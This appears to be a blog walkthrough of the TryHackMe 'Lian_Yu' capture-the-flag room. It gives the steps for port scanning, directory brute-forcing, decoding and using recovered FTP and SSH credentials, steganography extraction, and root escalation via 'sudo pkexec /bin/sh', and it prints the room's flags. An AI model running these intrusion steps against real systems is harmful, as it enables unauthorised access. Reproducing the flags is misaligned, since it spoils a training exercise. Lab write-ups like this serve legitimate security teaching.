CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


17/11/2024 Shad Hussain Knowledge Views 567 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Lian_Yu - THM

Room Link : https://tryhackme.com/r/room/lianyu STEP1 nmap -p- -sSV 10.10.98.77 -Pn -A -T4 FINDING 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0) 80/tcp open http Apache httpd |_http-title: Purgatory |_http-server-header: Apache 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 35261/udp6 status | 100024 1 45319/udp status | 100024 1 46264/tcp status |_ 100024 1 52094/tcp6 status 46264/tcp open status 1 (RPC #100024) ------------------------------------------------------------------------------------ STEP2 feroxbuster --url http://10.10.98.77 FINDING 200 GET 59l 358w 2506c http://10.10.98.77/ 301 GET 7l 20w 234c http://10.10.98.77/island = http://10.10.98.77/island/ FINDING http://10.10.98.77/island/ go inspect to find the code vigilante ------------------------------------------------------------------------------------ STEP3 gobuster dir -u 10.10.13.232/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt FINDING 2100 QUESTION What is the Web Directory you found? 2100 ------------------------------------------------------------------------------------ STEP4 http://10.10.13.232/island/2100 go to source FINDING !-- you can avail your .ticket here but how? -- means the file extinction is .ticket ------------------------------------------------------------------------------------ STEP5 gobuster dir -u 10.10.13.232/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket FINDING http://10.10.164.47/island/2100/green_arrow.ticket what is the file name you found? green_arrow.ticket This is just a token to get into Queens Gambit(Ship) RTy8yhBQdscX use -- https://appdevtools.com/base58-encoder-decoder -- to decode base58 !#th3h00d what is the FTP Password? !#th3h00d ------------------------------------------------------------------------------------ STEP6 ftp 10.10.164.47 root : vigilante pwd : !#th3h00d ls -la get aa.jpg get Queens_Gambit.png get Leave_me_alone.png get .other_user ------------------------------------------------------------------------------------ STEP7 convert Leave_me_alone.png to proper .png file hexedit Leave_me_alone.png and change top left 8 two digit format to 89 50 4E 47 0D 0A 1A 0A and ctrl + c open the file in .png and get the password FINDING password is the password ------------------------------------------------------------------------------------ STEP8 steghide extract -sf aa.jpg passphrase : password a zip fill will appear unzip it FINDING passwd.txt This is your visa to Land on Lian_Yu # Just for Fun *** a small Note about it Having spent years on the island, Oliver learned how to be resourceful and set booby traps all over the island in the common event he ran into dangerous people. The island is also home to many animals, including pheasants, wild pigs and wolves. shado M3tahuman what is the file name with SSH password? shado ------------------------------------------------------------------------------------ STEP9 OPEN .other_user we got from ftp FINDING slade is the ssh user name ssh [email protected] pwd : M3tahuman ------------------------------------------------------------------------------------ STEP10 ls -la cat user.txt user.txt THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0NT} ------------------------------------------------------------------------------------ STEP11 sudo -l pwd : M3tahuman FINDING (root) PASSWD: /usr/bin/pkexec ------------------------------------------------------------------------------------ STEP12 search on gtfobin https://gtfobins.github.io/gtfobins/pkexec/#sudo FINDING sudo pkexec /bin/sh whoami root cd /root cat root.txt THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_ILL_BE_D34D} root.txt THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_ILL_BE_D34D} ------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved